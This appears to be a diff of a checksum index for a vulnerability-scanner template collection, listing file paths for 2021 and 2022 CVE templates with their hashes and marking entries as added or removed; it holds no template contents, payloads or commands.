+http/cves/2021/CVE-2021-36580.yaml:f6d188ce8162dd4a3a753ac920098c55e62a0845 +http/cves/2021/CVE-2021-36748.yaml:28e6331305ffdaef3e03fa9d1550ac908d2b6414 +http/cves/2021/CVE-2021-36749.yaml:ec46955017b66ec92463041d01bd7bfdfecc2b1b +http/cves/2021/CVE-2021-36873.yaml:376f10a3b611347a1e7d13568bc9efb8e76f5ab9 +http/cves/2021/CVE-2021-37216.yaml:0bdc41e631ad80e58161590b40601baf699641c0 +http/cves/2021/CVE-2021-37304.yaml:fa8b348d24f271b644898eb0337d532d901f45c4 +http/cves/2021/CVE-2021-37305.yaml:03c68924ac928d0672c1ff4e67ea559dbb39ed64 +http/cves/2021/CVE-2021-37416.yaml:8e37d6f3e57dc6fc08303cf8f06dbb3e358d10c7 +http/cves/2021/CVE-2021-37538.yaml:c539cf0fc4f29b4dd0d21480c355ac7263ff5f79 +http/cves/2021/CVE-2021-37573.yaml:8d842a6a3c8f205083b2db4914db3dd2f4ecce3d +http/cves/2021/CVE-2021-37580.yaml:c60207572710b77119b04e983c761099cedd375b +http/cves/2021/CVE-2021-37589.yaml:b112c45e4501e9dce46c6594b5b7da5318ceed17 +http/cves/2021/CVE-2021-37704.yaml:76534b2541d774d6a15f6c62ac660cfff6554fde +http/cves/2021/CVE-2021-37833.yaml:a1684b67f12b5bde655be844af326ff7c0d65e8f +http/cves/2021/CVE-2021-38314.yaml:4ab0e1341adfe0d311d416c939460ef1d796fec1 +http/cves/2021/CVE-2021-38540.yaml:a0850c9b599e4aa15868dc6eb30d5d61638f5bec +http/cves/2021/CVE-2021-38647.yaml:62edaac22f00298f8f693937924a58905c231455 +http/cves/2021/CVE-2021-38702.yaml:359561051625e157b7b66f613320593d205fea10 +http/cves/2021/CVE-2021-38704.yaml:07a1997835d2f1b30fd0bb02fd5b491da3296e16 +http/cves/2021/CVE-2021-38751.yaml:3522ae6b9764a2816b8f0b7ce5f84071e335fc04 +http/cves/2021/CVE-2021-39141.yaml:8555f9c1e9bcb8f6668c134d97e0a68cceafa9b1 +http/cves/2021/CVE-2021-39144.yaml:2c04c58d042aeb658004d17bb21cb5bd92e4cbf3 +http/cves/2021/CVE-2021-39146.yaml:0f26c9b132fa46ece1ec8b6c9e776dddc5c4ac8d +http/cves/2021/CVE-2021-39152.yaml:af84c1315ba44bc148fd2b9b85228c901f5b1667 +http/cves/2021/CVE-2021-39165.yaml:98f60c78f8cfecac17445e01ac4496899e9741cd +http/cves/2021/CVE-2021-39211.yaml:7aefa89f4a55720c65d5845be4091e9a042f8510 +http/cves/2021/CVE-2021-39226.yaml:cacf2f58f4cfb161cd7d1a0ea2702212d568c884 +http/cves/2021/CVE-2021-39312.yaml:f4448da1a4c7ee292c6be019fed7f6929b4bf7f6 +http/cves/2021/CVE-2021-39316.yaml:e1d070ad67dae863ec8e9f1a8bdaa7ca2acf407d +http/cves/2021/CVE-2021-39320.yaml:1bc3967ee36bc8e9b8b01a88d4f86d80a2eecd04 +http/cves/2021/CVE-2021-39322.yaml:4e3f9cd5735eba98d115379b6d12ba6fb6f44773 +http/cves/2021/CVE-2021-39327.yaml:dd8f9f6fa44dea7712e90d29479129419ec8eaa1 +http/cves/2021/CVE-2021-39350.yaml:4500918f24b2b8ba0ecae7b9a167386ff68f2308 +http/cves/2021/CVE-2021-39433.yaml:ebaa2900f1a6a211a18aadd3488470f0c7e42cc7 +http/cves/2021/CVE-2021-39501.yaml:157b2a28ec0da3a37cbc49f12bbac4ae830586cb +http/cves/2021/CVE-2021-40149.yaml:0b6f7c1796a5d5d334f86be6e63af90c78df2405 +http/cves/2021/CVE-2021-40150.yaml:462209a78f70cf448040e1941a28293f382bdd7d +http/cves/2021/CVE-2021-40323.yaml:47dc6ce4236d30838aaa7dc1d79eb4e6861fd1f2 +http/cves/2021/CVE-2021-40438.yaml:d5f0d290589b5de9e6c86f0f7c1c4faa9121bc02 +http/cves/2021/CVE-2021-40539.yaml:030d995a8e63244ec57c91960eaca23dccafdd14 +http/cves/2021/CVE-2021-40542.yaml:ef709c09af78e906a9b32437dfcec17fb70fb199 +http/cves/2021/CVE-2021-40661.yaml:c8927b5951fa27fffb73924ebe7c08d67a5de55b +http/cves/2021/CVE-2021-40822.yaml:5cebaf15fc5c523c29d7891df327a69d2e8c3a4e +http/cves/2021/CVE-2021-40856.yaml:9b880e381c8cd11ea1312ef76d47f8a9c65168d8 +http/cves/2021/CVE-2021-40859.yaml:4ed771797de7eb97612a8e188b1d63305514e203 +http/cves/2021/CVE-2021-40868.yaml:32371dc22f1287fe3a5c1b32074d733e27403650 +http/cves/2021/CVE-2021-40870.yaml:d50c8644722686501ee0cf0bf72e2f67fe624014 +http/cves/2021/CVE-2021-40875.yaml:5a8806c96b283f85c3e80ea54f820ae1df93166f +http/cves/2021/CVE-2021-40908.yaml:3b132f0a4bb3ca9edcd8648f1c4d8fadfae5b030 +http/cves/2021/CVE-2021-40960.yaml:ee0d9a9f71208eba9cd9614c40b18d7b73c72f83 +http/cves/2021/CVE-2021-40968.yaml:18c8c364d82ef5443c829c5c09cf82537c229bb5 +http/cves/2021/CVE-2021-40969.yaml:921cfca85fc500bb292d799a2f308f4d45509eab +http/cves/2021/CVE-2021-40970.yaml:21a3442c46f488ee8daab51321d8b319e8b95b9d +http/cves/2021/CVE-2021-40971.yaml:6d93fb1dc7caa662118aa510b3728d25d0633176 +http/cves/2021/CVE-2021-40972.yaml:7176ed8f122e9ba0cccad381a484f7c73fdce294 +http/cves/2021/CVE-2021-40973.yaml:2124e22228bfc310427d2087e5e3da4f85966474 +http/cves/2021/CVE-2021-40978.yaml:48d54d4669bc9153f0f509dc13758076dd243298 +http/cves/2021/CVE-2021-41174.yaml:ddb4fa2ef0e9ae56c71680b94a1ff0b06a18445b +http/cves/2021/CVE-2021-41192.yaml:0605dfe7517366ecb841fae6867d8c3f277296ec +http/cves/2021/CVE-2021-41266.yaml:d4af8b94cdf6482e4c2d0c37ec56a249bbbcb561 +http/cves/2021/CVE-2021-41277.yaml:99a0c1ee7c069a0291de1f8631a43a24a166ea32 +http/cves/2021/CVE-2021-41282.yaml:cf2e5c67efb4308af0841972254e1e008834e32f +http/cves/2021/CVE-2021-41291.yaml:04a080102925f31b01e782de23028082bdb0f74a +http/cves/2021/CVE-2021-41293.yaml:5db5b52f36f67ec99c64640839d7a434e30299f6 +http/cves/2021/CVE-2021-41349.yaml:f1d5aa432d7a9f4e47792bf736b357c434232993 +http/cves/2021/CVE-2021-41381.yaml:30e0bae3afa55a332329f7d0d367fc3cbe7424f6 +http/cves/2021/CVE-2021-41432.yaml:8f5974832a28e59b5457632a6881493b58fe795e +http/cves/2021/CVE-2021-41460.yaml:43d2f05c06c8ad7ba6dc28927197830e6ce24fcc +http/cves/2021/CVE-2021-41467.yaml:199e7323e203a52a7c441d1c055e070b26ca8782 +http/cves/2021/CVE-2021-41569.yaml:57e6615f4250f289b89543c945b888068333c2e2 +http/cves/2021/CVE-2021-41648.yaml:bc9c5bbc5c6850479f215112bad36c26c6d1a118 +http/cves/2021/CVE-2021-41649.yaml:cf231dc484366e9e787a2231d05c11a718e6069e +http/cves/2021/CVE-2021-41653.yaml:a7b9553eb67dfc4b985ceeea323e19ed1814b00c +http/cves/2021/CVE-2021-41691.yaml:f2eac3d65329ccd5e847cf02263433b4d951d9b7 +http/cves/2021/CVE-2021-41773.yaml:7bdd79878de066ee716bd7e4e0d90c97d388cf38 +http/cves/2021/CVE-2021-41826.yaml:b495b5f4f3d4587fec3a94a48f92d8feb55250ec +http/cves/2021/CVE-2021-41878.yaml:37696b4aa9d1b8243cb6fdb9892c32cc695ad0e4 +http/cves/2021/CVE-2021-4191.yaml:4fb7b8c3694c2d63a8a95be3ae6ad5174d719054 +http/cves/2021/CVE-2021-41951.yaml:32dc9fea1cced566b06d28f532616371ddd56cff +http/cves/2021/CVE-2021-42013.yaml:05b11f3520001c719762c39cf5a41e1af05bb48a +http/cves/2021/CVE-2021-42063.yaml:37db366fca382eb6bfa2c44ab7a2dcc192fece2d +http/cves/2021/CVE-2021-42071.yaml:35a7fa27368b5b57a0f0bb7615bf16e0d0750102 +http/cves/2021/CVE-2021-42192.yaml:44a3d2e550ff74e55a3b7a38eb8af28f0502bb88 +http/cves/2021/CVE-2021-42237.yaml:0213c73cf8c4be3086399350429bfc335ea2f840 +http/cves/2021/CVE-2021-42258.yaml:8c6c72b2652bae0811a44996ff9c72030341a461 +http/cves/2021/CVE-2021-42551.yaml:eddd6d97681c36454a0f8e7207bc94329f50ca48 +http/cves/2021/CVE-2021-42565.yaml:65b0dd1187c462a7420cfded7fa78e3af47a6b6d +http/cves/2021/CVE-2021-42566.yaml:ff4b24f0853fe3b5784ec5f7fb47d72dafea9f44 +http/cves/2021/CVE-2021-42567.yaml:4dfa0be892e120e3f56fb0570c627e78c2a2ed9d +http/cves/2021/CVE-2021-42627.yaml:609c797ba059f916c9ebfcb8bfed4aedbf51aba8 +http/cves/2021/CVE-2021-42663.yaml:c69dcada3c15eb8d11a8f35eaa96f0928b492f26 +http/cves/2021/CVE-2021-42667.yaml:e2693144983f0470a615cec60ec5b58319f73933 +http/cves/2021/CVE-2021-42887.yaml:74be5f7bd72fef7559355ddc4a8835e277b8a1ef +http/cves/2021/CVE-2021-43062.yaml:156a6db491b1bdcab6968a38208ce190f0f6c38b +http/cves/2021/CVE-2021-43287.yaml:8fd928279b4e8002c1b434223084313b17e9741a +http/cves/2021/CVE-2021-43421.yaml:8201a5d3170e2e9e320cb2375f12b25efef95486 +http/cves/2021/CVE-2021-43495.yaml:59cdb367cead5386c12c988b0503f0e813d6d570 +http/cves/2021/CVE-2021-43496.yaml:4163af8dd9ffffbd64d6f072e052d88f83a52b43 +http/cves/2021/CVE-2021-43510.yaml:79cdbff6687ca7f793d90c3c27447970a4944c48 +http/cves/2021/CVE-2021-43574.yaml:02640caa2158f81a55a083e05c70770d2f0383c7 +http/cves/2021/CVE-2021-43725.yaml:ed7acde4800d8892ec39a08e35354505b5032123 +http/cves/2021/CVE-2021-43734.yaml:e5344dbae5c6c770244b95387a9aae8544fb0d7f +http/cves/2021/CVE-2021-43778.yaml:7f4311d6da51935016a4d55d6ccd5eeb47b88bef +http/cves/2021/CVE-2021-43798.yaml:65aaad7b6cf326df333c1ffa5960e89cefc861a3 +http/cves/2021/CVE-2021-43810.yaml:63da8341ac08b890d5afd9bf5c62ccd0d6d4be89 +http/cves/2021/CVE-2021-44077.yaml:3a6d7d83a21b6df87f74109148e216dbd61dc098 +http/cves/2021/CVE-2021-44138.yaml:2c522e870bc1ed4b7264fd18e1565699954e6262 +http/cves/2021/CVE-2021-44139.yaml:91d1f46adebe349e1765735ecdf9b308d505f3a5 +http/cves/2021/CVE-2021-44152.yaml:7bf9809de29a8320e8341b1400a42511c7392aac +http/cves/2021/CVE-2021-44228.yaml:8e4f51942ce7b79632bfbdc2d0e397024ddd3ec1 +http/cves/2021/CVE-2021-44427.yaml:381a7460b2f138d985fb5a58c41581b53f01c62d +http/cves/2021/CVE-2021-44451.yaml:0659f75c0d773a59dfcfc02abe2dc0e4d0849d8e +http/cves/2021/CVE-2021-44515.yaml:95b960f94708fc68a60ca4ad5b5e38e1815a1605 +http/cves/2021/CVE-2021-44528.yaml:eaf494ed01e40e0c8d5067ed3370af939a940b55 +http/cves/2021/CVE-2021-44529.yaml:95f738d35c54ad445a6a18f507fc4d54aee98271 +http/cves/2021/CVE-2021-44848.yaml:f7c236e1538f318230e708b1323eb556412005e5 +http/cves/2021/CVE-2021-45043.yaml:c61fcf7085afca39ee86aeb6a209ae1b7c6999e6 +http/cves/2021/CVE-2021-45046.yaml:519dde92a2bfa30ac1105cbbc042db59e8af327d +http/cves/2021/CVE-2021-45092.yaml:828ab7fdd75d8539dfcbbc1344ca982fb920b6f9 +http/cves/2021/CVE-2021-45232.yaml:cdf20351a03b42acf559f5327b8da0eda51dca1e +http/cves/2021/CVE-2021-45380.yaml:72c28e9ba0b0dcf247e341aa48c867dd1219bfc1 +http/cves/2021/CVE-2021-45422.yaml:e78ab7a6881b87d5e2c256e175f714216bcba7cc +http/cves/2021/CVE-2021-45428.yaml:77082a4f66bb68b8d4e98f2a2ff35b88b4b81f73 +http/cves/2021/CVE-2021-45967.yaml:7a262a89e56e21eef8fd69c2ff64b2bfd25a6185 +http/cves/2021/CVE-2021-45968.yaml:7e7d827ddd58de23ae74a5e607f8a4137798d46d +http/cves/2021/CVE-2021-46005.yaml:bf7834b2e091548498fc397a983ed61edc686ab3 +http/cves/2021/CVE-2021-46068.yaml:75b13819c6e6f559c002e1aee709c18336cbb9ee +http/cves/2021/CVE-2021-46069.yaml:d39d3fa805baf3308d296cc30f97bfda5990d2a4 +http/cves/2021/CVE-2021-46071.yaml:965accf3a158ddeae5bbe969776bf557aeb5330b +http/cves/2021/CVE-2021-46072.yaml:1e5856c8733eac06ddb6de9b36cfe29506829c8b +http/cves/2021/CVE-2021-46073.yaml:04a539aecba9fca1c7f51f08be930b722dc3ecc2 http/cves/2021/CVE-2021-46107.yaml:a1658d92714c11c9665ff45882cb7458bb5f4f8c -http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6 -http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953 -http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6 -http/cves/2021/CVE-2021-46417.yaml:2ac0378768d81d49c164b3d3c0df6152eff34f57 -http/cves/2021/CVE-2021-46422.yaml:875d97af8c60fef51981f600bcf13729d23624f8 -http/cves/2021/CVE-2021-46424.yaml:e7ab42513437f405f2b047ed0806824956de1558 -http/cves/2021/CVE-2021-46704.yaml:06293c759ef4478337fad3bc29c93141918e8031 -http/cves/2022/CVE-2022-0140.yaml:b6587a96705a9aaaad1afe493eab633e61eb353d -http/cves/2022/CVE-2022-0147.yaml:7e69ed6424228e06d87f0a85e2c17ca663147277 -http/cves/2022/CVE-2022-0148.yaml:7c9163e6973a70210363cb78d459569edff8c208 -http/cves/2022/CVE-2022-0149.yaml:e92fdc37586eae17ce33bb0a874183ad3b5e474d -http/cves/2022/CVE-2022-0150.yaml:5b99e80e5941bfaf9b29fb07f5ecbc0b4e1f4b26 -http/cves/2022/CVE-2022-0165.yaml:82f3cc42b60a39f4ce865d710a4787c84dbe3b0a -http/cves/2022/CVE-2022-0169.yaml:626debb675cf2b10a0e7c2d4ff379eca9ca0ef48 -http/cves/2022/CVE-2022-0189.yaml:327a73cef1e004bf5ce2602a3e0cd7c921a455fe -http/cves/2022/CVE-2022-0201.yaml:a0857dac1b4f0e5e2909649ad70ec45d3eaa59d8 -http/cves/2022/CVE-2022-0206.yaml:fd02f99e7b5ddba8765a616ab849290a6053b293 -http/cves/2022/CVE-2022-0208.yaml:bc6cd9d15efd6104978703031a5d3ffd28b99e5c -http/cves/2022/CVE-2022-0212.yaml:ef3c396fc97b435d4545e28358a0d4a0f1c14206 -http/cves/2022/CVE-2022-0218.yaml:6ce94fff8c95ee7855b5222398d37e3ee9d838cb -http/cves/2022/CVE-2022-0220.yaml:0cb350f49d001a9e5090e5a14b2b929f1c20796a -http/cves/2022/CVE-2022-0234.yaml:085aec6c2a493df3a7a0203e8fdd9f5f74042fa2 -http/cves/2022/CVE-2022-0271.yaml:382a8ccf821161d87771a44c3f8cdf875200201b -http/cves/2022/CVE-2022-0281.yaml:41757c8e4919461bc1d50053b83f0befeb24e4e7 -http/cves/2022/CVE-2022-0288.yaml:40b9f1295610f4074b666964c5132399313d2c5d -http/cves/2022/CVE-2022-0346.yaml:bb6c63aa596a064eb3e8cfa13e8cb379d41f8157 -http/cves/2022/CVE-2022-0349.yaml:b362d2f5d869d3019d85797f39ac747de0bb5f87 -http/cves/2022/CVE-2022-0378.yaml:cfcb9f713483de45e777beb918b28671356327a5 -http/cves/2022/CVE-2022-0381.yaml:1c0bea143f4846f5d5a3b6571198c3d4747200d7 -http/cves/2022/CVE-2022-0412.yaml:6af0a0a54646414190ede17956b345623901cb40 -http/cves/2022/CVE-2022-0415.yaml:3235fb2cb43ccbdc3e438d4cfbdb82fc5635e925 -http/cves/2022/CVE-2022-0422.yaml:a8987b22fe3117bd5383ca3e56a72f27ef2a56e1 -http/cves/2022/CVE-2022-0432.yaml:91ad513829f5e5563932c42826c20231dd621530 -http/cves/2022/CVE-2022-0434.yaml:385d03559567c3b0b971386e78b8169426fbc1cd -http/cves/2022/CVE-2022-0437.yaml:a6129aafeb70da2e12660cf36afcd028c2fc519d -http/cves/2022/CVE-2022-0441.yaml:b4700500e87497d53f6aa7a53ddc88e70a84b442 -http/cves/2022/CVE-2022-0482.yaml:8440037a303f75acdf9303f90d5c383d50c9411b -http/cves/2022/CVE-2022-0535.yaml:e8eab9b7f02958910200f39a50dd044602332efc -http/cves/2022/CVE-2022-0540.yaml:21949182c1a5cfcd2a152b2b4b522c72f27848ff -http/cves/2022/CVE-2022-0591.yaml:a170e991ebb82481c2af6738b43ea2752ee47433 -http/cves/2022/CVE-2022-0594.yaml:f5e87aca04080106ceec4fc1ebaa40693a12dcbf -http/cves/2022/CVE-2022-0595.yaml:0ca91b1202d11bfc67c79cff97ffcf01f69dc576 -http/cves/2022/CVE-2022-0599.yaml:a36f008a933e225e90ca19eb95db9e05a1a2a361 -http/cves/2022/CVE-2022-0653.yaml:4b91e5a4a2979845245c4ef08965bc6da6251e0d -http/cves/2022/CVE-2022-0656.yaml:04a4edf50f6a6fa5830c63ad194d8e2550d39b0c -http/cves/2022/CVE-2022-0660.yaml:881af0301e20eb50768219017a67cd9ddbf673ee -http/cves/2022/CVE-2022-0678.yaml:cbbc891a8d44fed2b175d4dac7b6065574aa307e -http/cves/2022/CVE-2022-0679.yaml:74f714c2ab6f1e68798462c6dc5194d7ed08035b -http/cves/2022/CVE-2022-0692.yaml:6cf2ae4b6898f78b309d9a5add5212a5c7ff3b2c -http/cves/2022/CVE-2022-0693.yaml:e828452acc5d341be96cf387e2510954757a95e3 -http/cves/2022/CVE-2022-0735.yaml:7233a4a226afde33a88d36cb9c3bc29a5c17553d -http/cves/2022/CVE-2022-0747.yaml:8962865a1f766eb2d89c4d250a3e3d9417748523 -http/cves/2022/CVE-2022-0760.yaml:bcffa2361a31ecd5d0540f3fa4530b4aa93f6d48 -http/cves/2022/CVE-2022-0769.yaml:141f13cedef3bc04c4f642da4ffe7545ac3dab4a -http/cves/2022/CVE-2022-0773.yaml:be1e81b465bf8d742137f553fd76f5b2c7b3c700 -http/cves/2022/CVE-2022-0776.yaml:6d72bdebd2623433eae447dc24967ca520a2049c -http/cves/2022/CVE-2022-0781.yaml:c29fb39817ed2bf4a36632591edb1b980571dafa -http/cves/2022/CVE-2022-0784.yaml:3867de9b76bf47d055a7ba27211a30bcdbc0e4eb -http/cves/2022/CVE-2022-0785.yaml:02f48c3a0561c2ae1e7f5a1ab46266a124fc9091 -http/cves/2022/CVE-2022-0786.yaml:08db3dbcb8fc206ac495c93fc07c815027a543ce -http/cves/2022/CVE-2022-0788.yaml:c432a28860a0d0a3fa4f994d077b83f4c11400b1 -http/cves/2022/CVE-2022-0817.yaml:5333bb05c885322d8872d3cbb05feaae2755bab0 -http/cves/2022/CVE-2022-0824.yaml:ae34b9aaa29db585be0cb50d482e8ad1d37c182c -http/cves/2022/CVE-2022-0826.yaml:4d0bdacb4478f980518b20e299d426d8c460858b -http/cves/2022/CVE-2022-0827.yaml:90b19eeeb9044d055d9ff1f733b1ed02c6929fca -http/cves/2022/CVE-2022-0846.yaml:51600bcdff4a42fa9dd525eac98400be7328fe29 -http/cves/2022/CVE-2022-0864.yaml:41b302829a186bfcc3607c748f6a85b56347ae7a -http/cves/2022/CVE-2022-0867.yaml:795f19cb9728cb036f046df7dd4bca684cd50430 -http/cves/2022/CVE-2022-0869.yaml:3b827dbe01aa098f1d8039012f6bf33dac872898 -http/cves/2022/CVE-2022-0870.yaml:b0a62e8f05eef6b0ccaac3b9df8fb3a28d637ec5 -http/cves/2022/CVE-2022-0885.yaml:777c12000b2ae475ab0ae3fa88cce846cc6e5dce -http/cves/2022/CVE-2022-0928.yaml:14ce5e2620cc36efb6d56d70408099039ecb9fd6 -http/cves/2022/CVE-2022-0948.yaml:8a96779d7684cb16eda47e8a57483c580d1f252f -http/cves/2022/CVE-2022-0949.yaml:a53325d7e2214fc1b101262ea4c24d47522cd992 -http/cves/2022/CVE-2022-0952.yaml:9e02e09013436a0445234b08091cef8047d4e8fc -http/cves/2022/CVE-2022-0954.yaml:93990f454bff927fabecb7b76958002ef407c7a9 -http/cves/2022/CVE-2022-0963.yaml:1758ba6cbb25c4f8e072d3359798b639a79f2480 -http/cves/2022/CVE-2022-0968.yaml:7b17a6df723d186779576199b4853c601f9ddeb1 -http/cves/2022/CVE-2022-1007.yaml:ede22bb5c3f6f9953511594cb934f4e742175d83 -http/cves/2022/CVE-2022-1013.yaml:00c769e0e5846ef00524597d8abccb8a9fc913b4 -http/cves/2022/CVE-2022-1020.yaml:8f31e061dc1812ccfa926a5cac6ee4fcdb7dc83e -http/cves/2022/CVE-2022-1040.yaml:753a63b6f6149c4dbd6c1b3acc9e44c17da3836d -http/cves/2022/CVE-2022-1054.yaml:f43ec6236ad6cb70eb9033539813e2acd8162871 -http/cves/2022/CVE-2022-1057.yaml:a55935dd21a2664d9012cd29af53a6515e3337aa -http/cves/2022/CVE-2022-1058.yaml:39c3499fe5f0cc3dc04400824a449530db6783cf -http/cves/2022/CVE-2022-1119.yaml:b42fe4d6d0514960fa89873055bfae070e62acea -http/cves/2022/CVE-2022-1162.yaml:841b8d6c7d1205fc056039e12d66fb3a6b1b3d95 -http/cves/2022/CVE-2022-1168.yaml:7363e324a07fec8474111a1b18553548ad93bf69 -http/cves/2022/CVE-2022-1221.yaml:9147d7ceb4b4b6b34e49acdcb4fc3aba8e9b5e64 -http/cves/2022/CVE-2022-1329.yaml:8c79d8f3f422056daf39b9118e50f7073273aa22 -http/cves/2022/CVE-2022-1386.yaml:466a8a81add5868b372f8b82fa5e97eab04e6ffd -http/cves/2022/CVE-2022-1388.yaml:c406ace27697e14e0b882d892df1431d0020d83a -http/cves/2022/CVE-2022-1390.yaml:d160c87d0b5cf8707f4e2e5e93aa2335845f3a00 -http/cves/2022/CVE-2022-1391.yaml:abf4c4d0fd6b7606d3223acaadbcae3e1d66c441 -http/cves/2022/CVE-2022-1392.yaml:08ce2ea5629aebbaa7beb8b5b73eb3dd3552c81c -http/cves/2022/CVE-2022-1398.yaml:1c4fcb9c72596e555ea28ce46c430a55f6f9731e -http/cves/2022/CVE-2022-1439.yaml:8fccd59668d11ee290aa4dcb9dbd2b1c0f096fac -http/cves/2022/CVE-2022-1442.yaml:42c31d615f77c210b1d5dfb487296ef9ed8e0b18 -http/cves/2022/CVE-2022-1574.yaml:db8c6229682a5ce91f8ea529b51871c53d220722 -http/cves/2022/CVE-2022-1595.yaml:103d01f65b586ff805bbda60597d47fcc0501437 -http/cves/2022/CVE-2022-1597.yaml:2794776d9dc32b0f34b444347f2c8bf424b78fcd -http/cves/2022/CVE-2022-1598.yaml:5b10387fa0943e977f9d7b1c17e620146ad53e02 -http/cves/2022/CVE-2022-1609.yaml:5c370a7c75420d202b3a874f8702aa85e39d1335 -http/cves/2022/CVE-2022-1713.yaml:1c67367a300f34919a82cb7f7f11aa69d2a29ad2 -http/cves/2022/CVE-2022-1724.yaml:b1b35bda2f7c189b3cdfcf0c4bda66fcdbbecfed -http/cves/2022/CVE-2022-1756.yaml:63710bb0e193b1563b990986024ace1a1658a946 -http/cves/2022/CVE-2022-1768.yaml:206d4d87cca74f9f1a29e71c83d4bf7c3b85b277 -http/cves/2022/CVE-2022-1815.yaml:766bff33c3ab982df433127e58aa89a327c156e3 -http/cves/2022/CVE-2022-1883.yaml:54e36ada312af41e5e80c08ebc4cb10ea73792ea -http/cves/2022/CVE-2022-1903.yaml:b927a0cd033bf4d44ee3bdf573dc0c1560c021cd -http/cves/2022/CVE-2022-1904.yaml:1ec8e74fda70b283b146ca03da5079eb03ba4924 -http/cves/2022/CVE-2022-1906.yaml:f4fd3d67222b3d1722016688c0ddf7226a7fc4e5 -http/cves/2022/CVE-2022-1910.yaml:7c1ad609fb9f788cdcb303b2763f8751ee382eea -http/cves/2022/CVE-2022-1916.yaml:504d78437c1e431c32ff3d546d4c873ddf28cc02 -http/cves/2022/CVE-2022-1933.yaml:6818d9d5b9c54003b7bb9e12dfb12264a3537d5b -http/cves/2022/CVE-2022-1937.yaml:6e8700dcec82eaac33c43e0fac015f35662451f3 -http/cves/2022/CVE-2022-1946.yaml:a4d25f312787b77b591d153f3e64a604602aa72f -http/cves/2022/CVE-2022-1952.yaml:f7e4dc3e9aeb62635fccc642cc90c1d859ea456d -http/cves/2022/CVE-2022-2034.yaml:ecad054e8735d1bb3db12ed8c90e3a8efd1b2494 -http/cves/2022/CVE-2022-21371.yaml:8337cd866e3bd7c3b6fee4ffca960e15be669c34 -http/cves/2022/CVE-2022-21500.yaml:41267f4f3d11b076b58f97a06543340b0a553245 -http/cves/2022/CVE-2022-21587.yaml:52fc5b96e85f091d771850c50e5d82d38e183879 -http/cves/2022/CVE-2022-21661.yaml:e778d93bd0973ae6d13849c1312cad355a1b93ed -http/cves/2022/CVE-2022-21705.yaml:5d53994b2b1243253ac5b600470a7972a08b2fb2 -http/cves/2022/CVE-2022-2185.yaml:80c738b5185300ea2fd38bd3972747a608861705 -http/cves/2022/CVE-2022-2187.yaml:5675f6a4bb75d9048991d778bf8543adc4c97f1e -http/cves/2022/CVE-2022-2219.yaml:a59bb6d829f2fdc9671a38e584a860eea9c9cd66 -http/cves/2022/CVE-2022-22242.yaml:99f960b60f99e11d86ad98900c6c0b8231bb98b4 -http/cves/2022/CVE-2022-22536.yaml:8a5c6ff47722c5d7fb705b6cb61d637c06bcbed5 -http/cves/2022/CVE-2022-22733.yaml:3c6067c620d8b06fb46980049868a7345e554610 -http/cves/2022/CVE-2022-22897.yaml:49905fe70c18f1e6c3cf9413555023c235278599 -http/cves/2022/CVE-2022-2290.yaml:c796496c7011655bc31ca614165edd455c9bd7f7 -http/cves/2022/CVE-2022-22947.yaml:cbf32483fa84993460b68e6f7c3df5c7e195f7e6 -http/cves/2022/CVE-2022-22954.yaml:7a3b8883fbd90d2b688b6d463eecaec1d542e21d -http/cves/2022/CVE-2022-22963.yaml:edf6cb25b8c235261341056e9a04264e197a3813 -http/cves/2022/CVE-2022-22965.yaml:7351db5f05017423e5c48d34a387fbac9059c216 -http/cves/2022/CVE-2022-22972.yaml:26d9bbeb7e1ac83125df43f0b17f5ba743f96a92 -http/cves/2022/CVE-2022-23102.yaml:ea8d6134a3fdcf58e89b0bf2d4545a27dcd136ad -http/cves/2022/CVE-2022-23131.yaml:c56a07f222205e9be197328b3e4f85a456f304b7 -http/cves/2022/CVE-2022-23134.yaml:97c690898a5fc6f28b72f453021f29005f756af4 -http/cves/2022/CVE-2022-2314.yaml:4fc7bc1f3411da21d90d048e8aa1a1e6f32119c8 -http/cves/2022/CVE-2022-23178.yaml:de0f98a6d445058175f856d321ec9cdfa44dd82d -http/cves/2022/CVE-2022-23347.yaml:658f9f46337fa4c2b37989e5b16bb50e9e46b612 -http/cves/2022/CVE-2022-23348.yaml:037ba8d5c2a255219a0b8bfe1d1fe33681776dc2 -http/cves/2022/CVE-2022-23544.yaml:5dfac6eb8fc89de488a159a37a4de03dd85527a1 -http/cves/2022/CVE-2022-2373.yaml:00888fbc574a907091396da4b0273640edd72a2d -http/cves/2022/CVE-2022-2376.yaml:0d1fccb9b64a410436dd304e471aa1080ae2e1bd -http/cves/2022/CVE-2022-23779.yaml:9fd1c947986514499bc8272415698ba16946a934 -http/cves/2022/CVE-2022-2379.yaml:6e54acc066f3b0fa1b35dd95caf3e56e67b99902 -http/cves/2022/CVE-2022-23808.yaml:833b8f4905e568b6b5e522efb799eb460f2b7b8c -http/cves/2022/CVE-2022-2383.yaml:adb904323afcaec8c7d06afe1e7acd6ce2d8074f -http/cves/2022/CVE-2022-23854.yaml:e6d4f51a651844a89ae5ac1ce50829be6d805615 -http/cves/2022/CVE-2022-23881.yaml:67fd385188f0d0bcf130848a65daddeca5827433 -http/cves/2022/CVE-2022-23898.yaml:d64a682d762332a906543bdd20843338516cf314 -http/cves/2022/CVE-2022-23944.yaml:d9d019b4ae2d4f19d03f9f4a14babd56272bfcf2 -http/cves/2022/CVE-2022-24112.yaml:d34021fc20a99f80ccebfec2f7fc3b6ad8033abb -http/cves/2022/CVE-2022-24124.yaml:99e4c1abce61bf897197c8dbcda023fb9335f601 -http/cves/2022/CVE-2022-24129.yaml:295cf475a2a171e30460dc0bfefea23b188dec6f -http/cves/2022/CVE-2022-2414.yaml:d3b98c7938a995086c756bf4e9643564d4b001f7 -http/cves/2022/CVE-2022-24181.yaml:e9f5dfcb7eb017affad3d42c6d08005a81396252 -http/cves/2022/CVE-2022-24223.yaml:84ee3c19af6211ad6b830fb6fe2f6cf3170cfac4 -http/cves/2022/CVE-2022-24260.yaml:dc9c44eb66cf123111e5f2983b33902cea1dc509 -http/cves/2022/CVE-2022-24264.yaml:1c26318f27783ef945c60c0f722e89f040b9c810 -http/cves/2022/CVE-2022-24265.yaml:0af0ea0ae6426ba38154b51ded150844d0b62259 -http/cves/2022/CVE-2022-24266.yaml:39ea3c6c70f6ca4864a802a73cf5f79df54a970c -http/cves/2022/CVE-2022-24288.yaml:11caad1f295d447aa50feaf44d46bc45bccb0cd8 -http/cves/2022/CVE-2022-24384.yaml:88b1ca280ed85276e55be21110039eb0ac0ce9bd 